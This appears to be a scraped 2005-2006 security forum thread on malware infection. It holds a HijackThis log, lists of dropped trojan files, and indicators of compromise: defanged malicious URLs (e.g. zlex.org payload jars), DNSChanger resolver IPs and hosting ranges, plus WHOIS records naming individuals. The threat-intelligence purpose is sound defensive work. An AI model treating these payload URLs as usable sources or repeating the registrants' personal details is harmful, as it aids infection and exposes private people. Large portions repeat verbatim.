R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///C:/Documents%20and%20Settings/spywarekiller/My%20Documents/homepage/ShareTheFiles%20-%20SeK%AEeT%20liNKs%A9.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = hxxp://www.adware-free-security.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:7212
F3 - REG:win.ini: run=C:\WINDOWS\System32\vxgame3.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - (no file) [coolwebsearch?]
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\Program Files\FlashGet\jccatch.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O3 - Toolbar: Net Snippets - {67970B26-F57D-4455-8262-81C3AE3B8B5E} - C:\PROGRA~1\NETSNI~1\NetSnip.dll
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [VMware User Process] C:\Program Files\VMware\VMware Tools\VMwareUser.exe
O4 - HKLM\..\Run: [RegRun WinBait] C:\WINDOWS\winbait.exe
O4 - HKLM\..\Run: [@RegRunOnSecure] C:\PROGRA~1\Greatis\REGRUN~1\OnSecure.exe
O4 - HKLM\..\Run: [Acronis Schedule] "C:\Program Files\Common Files\Acronis\Schedule\schedule.exe"
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [Hotkeycontrol] C:\Program Files\Hotkeycontrol XP\hkcontrol.exe
O4 - HKLM\..\Run: [GhostSurfDelSatellite] C:\Program Files\GhostSurf 2005\DeleteSatellite.exe
O4 - HKLM\..\Run: [Ad Muncher] C:\Program Files\Ad Muncher\AdMunch.exe /bt
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels64.exe
O4 - HKLM\..\Run: [igfxsrvs] C:\WINDOWS\System32\igfxsrv.exe
O4 - HKLM\..\Run: [SystemLoader] C:\WINDOWS\sysldr32.exe
O4 - HKLM\..\Run: [xp_system] C:\WINDOWS\System32\vxgame3.exe
O4 - HKLM\..\Run: [Microsoft Office] C:\WINDOWS\System32\msvcp.exe
O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels64.exe
O4 - HKCU\..\Run: [Regrun2] C:\PROGRA~1\Greatis\REGRUN~1\regrun2.exe /c 1
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Windows installer] C:\winstall.exe
O4 - HKCU\..\Run: [pro] C:\WINDOWS\System32\vxh8jkdq2.exe
O4 - HKCU\..\Run: [xp_system] C:\WINDOWS\System32\vxgame3.exe
O4 - Startup: c-program files-filemap by bb v405-bootalert.LNK = C:\Program Files\FileMap By BB v405\Bootalert.exe
O4 - Startup: Outpost Firewall.lnk = C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
O8 - Extra context menu item: Add to Net Snippets - C:\PROGRA~1\NETSNI~1\Res\Clipper.htm
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Snippets - {7130DF06-BBC1-4e16-83D4-1F875E65B695} - C:\PROGRA~1\NETSNI~1\NetSnip.dll
O9 - Extra button: HttpWatch - {D103E85B-5D67-42c1-8C83-F01079DBAB26} - C:\Program Files\HttpWatch\httpwtch.dll
O9 - Extra 'Tools' menuitem: HttpWatch - {D103E85B-5D67-42c1-8C83-F01079DBAB26} - C:\Program Files\HttpWatch\httpwtch.dll
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\flashget.exe
O9 - Extra button: SmartWhois - {FD9DE2B4-C926-4460-81C4-FC58C6F1062E} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O9 - Extra button: (no name) - {FF983118-58C7-4AD4-B5A7-691C39CB7B42} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O9 - Extra 'Tools' menuitem: SmartWhois - {FF983118-58C7-4AD4-B5A7-691C39CB7B42} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O12 - Plugin for .bcf: C:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Agnitum\OUTPOS~1\wl_hook.dll
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido\security suite\ewidoctrl.exe
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido\security suite\ewidoguard.exe
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMwareService.exe
Scan saved at 9:44:05 PM, on 11/4/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\VMware\VMware Tools\VMwareService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\Program Files\Common Files\Acronis\Schedule\schedule.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\Hotkeycontrol XP\hkcontrol.exe
C:\Program Files\Ad Muncher\AdMunch.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\PROGRA~1\Greatis\REGRUN~1\WatchDog.exe
C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
C:\Program Files\GhostSurf 2005\Proxy.exe
C:\Program Files\Sysinternals\ProcessExplorerNt\procexp.exe
C:\Program Files\CaptureWiz\Pro\CaptureWiz.exe
C:\Program Files\2xexplorer\2xExplorer\2xExplorer.exe
C:\System Tools\hijackthis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///C:/Documents%20and%20Settings/spywarekiller/My%20Documents/homepage/ShareTheFiles%20-%20SeK%AEeT%20liNKs%A9.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = hxxp://www.adware-free-security.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:7212
F3 - REG:win.ini: run=C:\WINDOWS\System32\vxgame3.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - (no file) [coolwebsearch?]
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\Program Files\FlashGet\jccatch.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O3 - Toolbar: Net Snippets - {67970B26-F57D-4455-8262-81C3AE3B8B5E} - C:\PROGRA~1\NETSNI~1\NetSnip.dll
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [VMware User Process] C:\Program Files\VMware\VMware Tools\VMwareUser.exe
O4 - HKLM\..\Run: [RegRun WinBait] C:\WINDOWS\winbait.exe
O4 - HKLM\..\Run: [@RegRunOnSecure] C:\PROGRA~1\Greatis\REGRUN~1\OnSecure.exe
O4 - HKLM\..\Run: [Acronis Schedule] "C:\Program Files\Common Files\Acronis\Schedule\schedule.exe"
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [Hotkeycontrol] C:\Program Files\Hotkeycontrol XP\hkcontrol.exe
O4 - HKLM\..\Run: [GhostSurfDelSatellite] C:\Program Files\GhostSurf 2005\DeleteSatellite.exe
O4 - HKLM\..\Run: [Ad Muncher] C:\Program Files\Ad Muncher\AdMunch.exe /bt
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels64.exe
O4 - HKLM\..\Run: [igfxsrvs] C:\WINDOWS\System32\igfxsrv.exe
O4 - HKLM\..\Run: [SystemLoader] C:\WINDOWS\sysldr32.exe
O4 - HKLM\..\Run: [xp_system] C:\WINDOWS\System32\vxgame3.exe
O4 - HKLM\..\Run: [Microsoft Office] C:\WINDOWS\System32\msvcp.exe
O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels64.exe
O4 - HKCU\..\Run: [Regrun2] C:\PROGRA~1\Greatis\REGRUN~1\regrun2.exe /c 1
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Windows installer] C:\winstall.exe
O4 - HKCU\..\Run: [pro] C:\WINDOWS\System32\vxh8jkdq2.exe
O4 - HKCU\..\Run: [xp_system] C:\WINDOWS\System32\vxgame3.exe
O4 - Startup: c-program files-filemap by bb v405-bootalert.LNK = C:\Program Files\FileMap By BB v405\Bootalert.exe
O4 - Startup: Outpost Firewall.lnk = C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
O8 - Extra context menu item: Add to Net Snippets - C:\PROGRA~1\NETSNI~1\Res\Clipper.htm
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Snippets - {7130DF06-BBC1-4e16-83D4-1F875E65B695} - C:\PROGRA~1\NETSNI~1\NetSnip.dll
O9 - Extra button: HttpWatch - {D103E85B-5D67-42c1-8C83-F01079DBAB26} - C:\Program Files\HttpWatch\httpwtch.dll
O9 - Extra 'Tools' menuitem: HttpWatch - {D103E85B-5D67-42c1-8C83-F01079DBAB26} - C:\Program Files\HttpWatch\httpwtch.dll
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\flashget.exe
O9 - Extra button: SmartWhois - {FD9DE2B4-C926-4460-81C4-FC58C6F1062E} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O9 - Extra button: (no name) - {FF983118-58C7-4AD4-B5A7-691C39CB7B42} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O9 - Extra 'Tools' menuitem: SmartWhois - {FF983118-58C7-4AD4-B5A7-691C39CB7B42} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O12 - Plugin for .bcf: C:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Agnitum\OUTPOS~1\wl_hook.dll
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido\security suite\ewidoctrl.exe
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido\security suite\ewidoguard.exe
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMwareService.exe
QUOTE
*****************************
COMPARING RECORDS FROM WINDOWS
*****************************
-----------------------------
sysldr32.exe
-----------------------------
*****************************
*****************************
COMPARING RECORDS FROM C:\ ROOT
*****************************
-----------------------------
boot.inx
lo-24810218.exe
winstall.exe
-----------------------------
*****************************
COMPARING RECORDS FROM SYSTEM32
*****************************
-----------------------------
kernels64.exe
maxd64.exe
mspostsp.exe
msupdate32.dll
msvcp.exe
netsh.exe
paradise.raw.exe
qvxgamet2.exe
qvxgamet3.exe
qvxgamet4.exe
svcp.csv
vx.tll
vxgame1.exe
vxgame2.exe
vxgame3.exe
vxgame4.exe
vxgame6.exe
vxgamet1.exe
vxgamet2.exe
vxgamet3.exe
vxgamet4.exe
vxh8jkdq1.exe
vxh8jkdq2.exe
vxh8jkdq5.exe
vxh8jkdq6.exe
vxh8jkdq7.exe
winsub.xml
-----------------------------
*****************************
COMPARING RECORDS FROM WINDOWS
*****************************
-----------------------------
sysldr32.exe
-----------------------------
*****************************
*****************************
COMPARING RECORDS FROM C:\ ROOT
*****************************
-----------------------------
boot.inx
lo-24810218.exe
winstall.exe
-----------------------------
*****************************
COMPARING RECORDS FROM SYSTEM32
*****************************
-----------------------------
kernels64.exe
maxd64.exe
mspostsp.exe
msupdate32.dll
msvcp.exe
netsh.exe
paradise.raw.exe
qvxgamet2.exe
qvxgamet3.exe
qvxgamet4.exe
svcp.csv
vx.tll
vxgame1.exe
vxgame2.exe
vxgame3.exe
vxgame4.exe
vxgame6.exe
vxgamet1.exe
vxgamet2.exe
vxgamet3.exe
vxgamet4.exe
vxh8jkdq1.exe
vxh8jkdq2.exe
vxh8jkdq5.exe
vxh8jkdq6.exe
vxh8jkdq7.exe
winsub.xml
-----------------------------
*****************************
Created folder :
QUOTE
C:\WINDOWS\inet20004\*
= services.exe
= services.exe
c:\windows\temp\pay4.tmp.exe
C:\winstall.exe
C:\WINDOWS\System32\vxgame3.exe
C:\WINDOWS\System32\kernels64.exe
C:\WINDOWS\System32\igfxsrv.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
C:\WINDOWS\System32\vxgame3.exe
C:\WINDOWS\sysldr32.exe
Outbound connection by vxgame6.exe [ spambot? ] on smtp/port 25 to :
QUOTE
208.36.123.14
spf7-19.us4.outblaze.com
208.36.123.0 - 208.36.123.255
Outblaze, Limited
10 Marshall Street
Old Greenwich
CT
06870
United States
spf7-19.us4.outblaze.com
208.36.123.0 - 208.36.123.255
Outblaze, Limited
10 Marshall Street
Old Greenwich
CT
06870
United States
C:\WINDOWS\System32\msvcp.exe
http://www.sophos.com/virusinfo/analyses/trojagenthy.html
C:\WINDOWS\system32\msupdate32.dll
C:\WINDOWS\system32\mspostsp.exe
http://www.sophos.com/virusinfo/analyses/trojjupdropb.html
couldnt locate C:\WINDOWS\System32\igfxsrv.exe or pay4.tmp.exe
=================
Domains/IPs involved:
sakura.ctgameinfo.com 63.246.144.140
game4all.biz = 217.107.217.184
hxxp://85.255.113.10/
85.255.112.0 - 85.255.127.255
Inhoster hosting company
hxxp://httphost1/trial.php?rest=0&ver=16249104&a=00000002 69.50.175.178
hxxp://69.50.173.166/
69.50.173.166
69.50.160.0 - 69.50.191.255
InterCage, Inc
-
hxxp://evko.biz/
66.235.180.23
evko.biz
66.235.160.0 - 66.235.191.255
HopOne Internet Corporation
1010 Wisconsin Avenue N.W.
Washington
DC
-
hxxp://72.36.244.185/
72.36.244.185
blackhatz.info
72.36.244.129 - 72.36.244.255
Internet Technologies Ltd
IP Management Department
Saint Petersburg
Russian Federation
-
hxxp://www.crystalysmedia.com/
209.8.60.8
www.crystalysmedia.com
209.8.0.0 - 209.9.255.255
Beyond The Network America, Inc.
Reston Executive Center
-
hxxp://core.psyche-evolution.com/
64.62.171.238
core.psyche-evolution.com
McColo Corporation
-
hxxp://krostagur.info/
hxxp://buhartes.info/
hxxp://fantastar.info/
216.255.187.66
buhartes.info
216.255.176.0 - 216.255.191.255
InterCage, Inc.
-
hxxp://webfastlink-us.com/mafia/
81.31.34.130
webfastlink-us.com
81.31.32.0 - 81.31.35.255
Master Internet s.r.o.
Czech Republic
-
hxxp://69.50.161.106/
hxxp://badgirlspink.com/
hxxp://banners.geotarget.info/
hxxp://banners.sexsearch.com/
hxxp://ads.adultfriendfinder.com/
hxxp://banners.adultfriendfinder.com/
hxxp://graphics.adultfriendfinder.com/
hxxp://www.spicymovies.com/sex.gif
hxxp://sex.com/
downloader trojan ..
REFERER hxxp://zlex.org/per/?ct=lan
hxxp://zlex.org/per/jara.jar
hxxp://zlex.org/per/cura.anr
hxxp://zlex.org/per/aAnima.class
85.255.115.227
zlex.org
Reverse IP: Web server hosts 2 websites
Server Type: Apache/1.3.34 (Unix) PHP/4.4.0
IP Address: 85.255.115.227
IP Location: - Inhoster Hosting Company
2 domains found on 85.255.115.227
www.Zlex.org
www.2youx.net
Domain ID:D111609078-LROR
Domain Name:ZLEX.ORG
Created On:13-Jan-2006 20:23:14 UTC
Last Updated On:14-Jan-2006 12:14:16 UTC
Expiration Date:13-Jan-2007 20:23:14 UTC
Sponsoring Registrar:Direct Information PVT Ltd. (R27-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:DI_1651225
Registrant Name:A Bronson
Registrant Organization:N/A
Registrant Street1:15001 Tyler St
Registrant City:Miami
Registrant State/Province:Florida
Registrant Postal Code:331767642
Registrant Country:US
---
Domain Name: 2YOUX.NET
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias ()
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660
Creation Date: 01-Feb-2006
Expiration Date: 01-Feb-2007
Domain servers in listed order:
ns1.zlex.org
ns2.zlex.org
85.255.112.0/20 is listed on the Spamhaus Block List (SBL)
REFERER hxxp://zlex.org/per/?ct=lan
hxxp://zlex.org/per/jara.jar
hxxp://zlex.org/per/cura.anr
hxxp://zlex.org/per/aAnima.class
85.255.115.227
zlex.org
Reverse IP: Web server hosts 2 websites
Server Type: Apache/1.3.34 (Unix) PHP/4.4.0
IP Address: 85.255.115.227
IP Location: - Inhoster Hosting Company
2 domains found on 85.255.115.227
www.Zlex.org
www.2youx.net
Domain ID:D111609078-LROR
Domain Name:ZLEX.ORG
Created On:13-Jan-2006 20:23:14 UTC
Last Updated On:14-Jan-2006 12:14:16 UTC
Expiration Date:13-Jan-2007 20:23:14 UTC
Sponsoring Registrar:Direct Information PVT Ltd. (R27-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:DI_1651225
Registrant Name:A Bronson
Registrant Organization:N/A
Registrant Street1:15001 Tyler St
Registrant City:Miami
Registrant State/Province:Florida
Registrant Postal Code:331767642
Registrant Country:US
---
Domain Name: 2YOUX.NET
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias ()
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660
Creation Date: 01-Feb-2006
Expiration Date: 01-Feb-2007
Domain servers in listed order:
ns1.zlex.org
ns2.zlex.org
85.255.112.0/20 is listed on the Spamhaus Block List (SBL)
QUOTE
19-Jan-2006 15:18 GMT | SR04
DNSChanger Trojan home
http://vil.mcafeesecurity.com/vil/content/v_136602.htm
Symptoms
* Presence of the file:
o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE
* Having DNS entries in any of your network adaptors with the values:
o 85.255.112.132
o 85.255.113.13
* Finding traffic targeting:
o 195.95.218.100
______
DNS also @85.255.114.36
[85.255.112.132] spbg9.mydomain.com
[85.255.113.13] mercury.xhpro.com
[85.255.114.36] dns12.esthost.com
[195.95.218.100] annyme.esthost.com
________
AS | IP | AS Name
26627 | 85.255.112.0 | AS-PILOSOFT - Pilosoft, Inc.
AS | IP | AS Name
27595 | 85.255.113.0 | INTERCAGE - InterCage, Inc.
AS | IP | AS Name
27595 | 85.255.114.0 | INTERCAGE - InterCage, Inc.
AS | IP | AS Name
27595 | 85.255.115.0 | INTERCAGE - InterCage, Inc.
________
inetnum: 85.255.112.0 - 85.255.127.255
netname: inhoster
descr: Inhoster hosting company
descr: OOO Inhoster, Poltavskij Shliax 24, Kharkiv, 61000, Ukraine
country: UA
inetnum: 195.95.218.0 - 195.95.219.255
netname: ESTHOST
descr: Inhoster hosting company
_____
DNSChanger Trojan home
http://vil.mcafeesecurity.com/vil/content/v_136602.htm
Symptoms
* Presence of the file:
o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE
* Having DNS entries in any of your network adaptors with the values:
o 85.255.112.132
o 85.255.113.13
* Finding traffic targeting:
o 195.95.218.100
______
DNS also @85.255.114.36
[85.255.112.132] spbg9.mydomain.com
[85.255.113.13] mercury.xhpro.com
[85.255.114.36] dns12.esthost.com
[195.95.218.100] annyme.esthost.com
________
AS | IP | AS Name
26627 | 85.255.112.0 | AS-PILOSOFT - Pilosoft, Inc.
AS | IP | AS Name
27595 | 85.255.113.0 | INTERCAGE - InterCage, Inc.
AS | IP | AS Name
27595 | 85.255.114.0 | INTERCAGE - InterCage, Inc.
AS | IP | AS Name
27595 | 85.255.115.0 | INTERCAGE - InterCage, Inc.
________
inetnum: 85.255.112.0 - 85.255.127.255
netname: inhoster
descr: Inhoster hosting company
descr: OOO Inhoster, Poltavskij Shliax 24, Kharkiv, 61000, Ukraine
country: UA
inetnum: 195.95.218.0 - 195.95.219.255
netname: ESTHOST
descr: Inhoster hosting company
_____
QUOTE
SECURITYNETCENTER.COM
Website Title: Error Detected
Response Code: 200
SSL Cert: No valid SSL on this Host, Get Secure
Server Type: Apache/1.3.34 (Unix) PHP/4.3.11
IP Address: 88.208.0.79
IP Location: - Haldex Ltd
Blacklist Status: Clear
Record Type: Domain Name
inetnum: 88.208.0.0 - 88.208.31.255
netname: HALDEX-NET
descr: Haldex Ltd.
country: UA
admin-c: SIY-RIPE
tech-c: SIY-RIPE
status: ASSIGNED PA
mnt-by: HALDEX-MNT
mnt-lower: HALDEX-MNT
mnt-routes: HALDEX-MNT
source: RIPE # Filtered
person: Yuriy Syvolotskyy
address: Avtoparkova st. 7
address: Kiev, Ukraine
phone: +3 8 044 4657255
e-mail: ripe@advancedhosters.com
nic-hdl: SIY-RIPE
source: RIPE # Filtered
Website Title: Error Detected
Response Code: 200
SSL Cert: No valid SSL on this Host, Get Secure
Server Type: Apache/1.3.34 (Unix) PHP/4.3.11
IP Address: 88.208.0.79
IP Location: - Haldex Ltd
Blacklist Status: Clear
Record Type: Domain Name
inetnum: 88.208.0.0 - 88.208.31.255
netname: HALDEX-NET
descr: Haldex Ltd.
country: UA
admin-c: SIY-RIPE
tech-c: SIY-RIPE
status: ASSIGNED PA
mnt-by: HALDEX-MNT
mnt-lower: HALDEX-MNT
mnt-routes: HALDEX-MNT
source: RIPE # Filtered
person: Yuriy Syvolotskyy
address: Avtoparkova st. 7
address: Kiev, Ukraine
phone: +3 8 044 4657255
e-mail: ripe@advancedhosters.com
nic-hdl: SIY-RIPE
source: RIPE # Filtered
Hi every one
I suggest you have a check to this ip's domain too. It has attempted to portscan my system several time within a daytime so...
196.206.120.223
I suggest you have a check to this ip's domain too. It has attempted to portscan my system several time within a daytime so...
196.206.120.223
Hello, I came across this thread doing a Google search for this domain BesTTest HardWare Lab from here:
inetnum: 81.177.3.0 - 81.177.3.255
netname: BESTTEST-RU
descr: besTTest - HW lab,
descr: Moscow, Russia
country: RU
admin-c: AV1919-RIPE
tech-c: AV1919-RIPE
status: ASSIGNED PA
notify: *******@besttest.ru
notify: ***@rtcomm.ru
mnt-by: AS8342-MNT
changed: ****@rt.ru 20040916
source: RIPE
person: Anatoliy Voronin
address: BesTTest HardWare Lab.
address: 125364, Moscow, Russia
address: Norilskaya str., 13A
e-mail: *****@besttest.ru
e-mail: ******@allforum.ru
remarks: phone: +7 095 5447337
phone: +7 495 5447337
remarks: fax-no: +7 095 5447337
fax-no: +7 495 5447337
notify: *****@besttest.ru
nic-hdl: AV1919-RIPE
changed: ****@rt.ru 20040714
changed: ****@rt.ru 20040915
changed: ****@rt.ru 20041110
source: RIPE
remarks: modified for Russian phone area changes
changed: ********@ripe.net 20051216
% Information related to '81.176.0.0/15AS8342'
route: 81.176.0.0/15
descr: RTCOMM-RU
origin: AS8342
notify: ***@rtcomm.ru
mnt-by: AS8342-MNT
changed: ***@rt.ru 20030120
changed: ***@rt.ru 20031105
changed: ***@rt.ru 20040809
source: RIPE
This site was in a new user profile at my site http://leforum.ru/ and the IP 81.177.3.211 led me to the rest. What a tangled web we weave.
inetnum: 81.177.3.0 - 81.177.3.255
netname: BESTTEST-RU
descr: besTTest - HW lab,
descr: Moscow, Russia
country: RU
admin-c: AV1919-RIPE
tech-c: AV1919-RIPE
status: ASSIGNED PA
notify: *******@besttest.ru
notify: ***@rtcomm.ru
mnt-by: AS8342-MNT
changed: ****@rt.ru 20040916
source: RIPE
person: Anatoliy Voronin
address: BesTTest HardWare Lab.
address: 125364, Moscow, Russia
address: Norilskaya str., 13A
e-mail: *****@besttest.ru
e-mail: ******@allforum.ru
remarks: phone: +7 095 5447337
phone: +7 495 5447337
remarks: fax-no: +7 095 5447337
fax-no: +7 495 5447337
notify: *****@besttest.ru
nic-hdl: AV1919-RIPE
changed: ****@rt.ru 20040714
changed: ****@rt.ru 20040915
changed: ****@rt.ru 20041110
source: RIPE
remarks: modified for Russian phone area changes
changed: ********@ripe.net 20051216
% Information related to '81.176.0.0/15AS8342'
route: 81.176.0.0/15
descr: RTCOMM-RU
origin: AS8342
notify: ***@rtcomm.ru
mnt-by: AS8342-MNT
changed: ***@rt.ru 20030120
changed: ***@rt.ru 20031105
changed: ***@rt.ru 20040809
source: RIPE
This site was in a new user profile at my site http://leforum.ru/ and the IP 81.177.3.211 led me to the rest. What a tangled web we weave.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.